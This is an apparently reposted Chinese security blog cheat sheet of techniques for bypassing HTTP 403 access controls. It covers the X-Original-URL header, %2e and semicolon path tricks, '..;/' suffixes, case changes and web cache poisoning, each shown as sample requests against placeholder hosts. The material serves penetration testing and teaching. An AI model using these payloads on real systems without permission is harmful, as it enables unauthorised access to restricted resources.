旁路 403(禁止访问)绕过
2023-1-11 17:54:6 Author: Ots安全(查看原文) 阅读量:8 收藏

  1. 使用“X-Original-URL”标头

GET /admin HTTP/1.1Host: target.com

试试这个绕过

GET /anything HTTP/1.1Host: target.comX-Original-URL: /admin

  1. 在第一个斜杠后附加%2e

http://target.com/admin => 403

试试这个绕过

http://target.com/%2e/admin => 200

  1. 尝试在 URL 中添加点 (.) 斜线 (/) 和分号 (;)

http://target.com/admin => 403

试试这个绕过

http://target.com/secret/. => 200http://target.com//secret// => 200http://target.com/./secret/.. => 200http://target.com/;/secret => 200http://target.com/.;/secret => 200http://target.com//;//secret => 200

  1. 在目录名后加“..;/”

http://target.com/admin

试试这个绕过

http://target.com/admin..;/

  1. 尝试将网址中的字母大写

http://target.com/admin

试试这个绕过

http://target.com/aDmIN

  1. 通过 Web 缓存中毒

GET /anything HTTP/1.1Host: victim.comX-Original-URL: /admin

工具:

https://github.com/search?q=Bypass-403


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496384&idx=3&sn=83576725ae96ed9dee2ba77830233720&chksm=9badbb8bacda329ddb75336388f8bdfcf3c6de20ea5db9add32f7c5f4caed5e2713c5915b2fe#rd
如有侵权请联系:admin#unsafe.sh